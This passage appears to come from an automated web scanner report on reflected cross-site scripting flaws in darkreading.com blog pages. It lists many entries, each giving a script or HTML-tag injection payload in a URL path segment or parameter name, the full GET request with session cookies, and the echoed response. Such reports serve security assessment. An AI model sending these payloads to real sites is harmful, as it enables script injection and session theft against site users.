This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/228800188/the-hazards-of-bot-volunteerism.html780c4'><img%20src%3da%20onerror%3dalert(1)>81855cecc83 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab13"><a>b650cac1690 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/228800188/the-hazards-of-bot-volunteerism.htmldab13"><a>b650cac1690 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7161f"><script>alert(1)</script>9ca9520969f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/228800188/the-hazards-of-bot-volunteerism.html?7161f"><script>alert(1)</script>9ca9520969f=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>The Hazar ...[SNIP]... lunteerism.html%3F7161f%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9ca9520969f%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/228800188/the-hazards-of-bot-volunteerism.html?7161f"><script>alert(1)</script>9ca9520969f=1"> ...[SNIP]...
3.333. http://www.darkreading.com/blog/archives/2008/01/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2008/01/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78250"><script>alert(1)</script>1c3d49e2ed3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2008/01/index.html?78250"><script>alert(1)</script>1c3d49e2ed3=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... Farchives%2F2008%2F01%2Findex.html%3F78250%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1c3d49e2ed3%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2008/01/index.html?78250"><script>alert(1)</script>1c3d49e2ed3=1"> ...[SNIP]...
3.334. http://www.darkreading.com/blog/archives/2008/02/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2008/02/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebacf"><script>alert(1)</script>08a3ca3627a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2008/02/index.html?ebacf"><script>alert(1)</script>08a3ca3627a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... Farchives%2F2008%2F02%2Findex.html%3Febacf%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E08a3ca3627a%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2008/02/index.html?ebacf"><script>alert(1)</script>08a3ca3627a=1"> ...[SNIP]...
3.335. http://www.darkreading.com/blog/archives/2008/03/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2008/03/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b5a"><script>alert(1)</script>3ebd8e76305 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2008/03/index.html?90b5a"><script>alert(1)</script>3ebd8e76305=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ff65"><a>f1e93473bbf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20087ff65"><a>f1e93473bbf/04/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F20087ff65%22%3E%3Ca%3Ef1e93473bbf%2F04%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/20087ff65"><a>f1e93473bbf/04/index.html"> ...[SNIP]...
3.337. http://www.darkreading.com/blog/archives/2008/04/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2008/04/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeed6"><script>alert(1)</script>1b032d76b5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2008/04/index.html?aeed6"><script>alert(1)</script>1b032d76b5a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c607"><a>fdd0268eb2d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20091c607"><a>fdd0268eb2d/01/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f546"><a>442078e1d55 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/013f546"><a>442078e1d55/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F013f546%22%3E%3Ca%3E442078e1d55%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/013f546"><a>442078e1d55/index.html"> ...[SNIP]...
3.340. http://www.darkreading.com/blog/archives/2009/01/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/01/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaa1a"><script>alert(1)</script>568669e013 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/01/index.html?eaa1a"><script>alert(1)</script>568669e013=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3735d"><a>a0c2fc53dc6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20093735d"><a>a0c2fc53dc6/02/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a3a4"><a>4b264c536df was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/028a3a4"><a>4b264c536df/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F028a3a4%22%3E%3Ca%3E4b264c536df%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/028a3a4"><a>4b264c536df/index.html"> ...[SNIP]...
3.343. http://www.darkreading.com/blog/archives/2009/02/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/02/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8251"><script>alert(1)</script>ef5873869a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/02/index.html?c8251"><script>alert(1)</script>ef5873869a5=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4e8"><a>1a5b60c275c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20092e4e8"><a>1a5b60c275c/03/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425a6"><a>82a928cd772 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/03425a6"><a>82a928cd772/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F03425a6%22%3E%3Ca%3E82a928cd772%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/03425a6"><a>82a928cd772/index.html"> ...[SNIP]...
3.346. http://www.darkreading.com/blog/archives/2009/03/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/03/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdb7"><script>alert(1)</script>e4227e10180 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/03/index.html?8fdb7"><script>alert(1)</script>e4227e10180=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c46a"><a>13c51bf9ac9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20095c46a"><a>13c51bf9ac9/04/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50bf8"><a>53b01c37cb6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/0450bf8"><a>53b01c37cb6/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F0450bf8%22%3E%3Ca%3E53b01c37cb6%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/0450bf8"><a>53b01c37cb6/index.html"> ...[SNIP]...
3.349. http://www.darkreading.com/blog/archives/2009/04/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/04/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9feee"><script>alert(1)</script>6e09887118d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/04/index.html?9feee"><script>alert(1)</script>6e09887118d=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f53ec"><a>2dae81427c4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009f53ec"><a>2dae81427c4/05/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced38"><a>dab7f04ca3b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/05ced38"><a>dab7f04ca3b/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F05ced38%22%3E%3Ca%3Edab7f04ca3b%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/05ced38"><a>dab7f04ca3b/index.html"> ...[SNIP]...
3.352. http://www.darkreading.com/blog/archives/2009/05/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/05/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e06c"><script>alert(1)</script>a34eb2449ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/05/index.html?4e06c"><script>alert(1)</script>a34eb2449ea=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dde48"><a>0c58d78c4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009dde48"><a>0c58d78c4c/06/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d397b"><a>e4384e6a732 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2009/06d397b"><a>e4384e6a732/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2009%2F06d397b%22%3E%3Ca%3Ee4384e6a732%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2009/06d397b"><a>e4384e6a732/index.html"> ...[SNIP]...
3.355. http://www.darkreading.com/blog/archives/2009/06/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/archives/2009/06/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6f6c"><script>alert(1)</script>98e0b46ad07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2009/06/index.html?e6f6c"><script>alert(1)</script>98e0b46ad07=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b18af"><a>e49760590fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
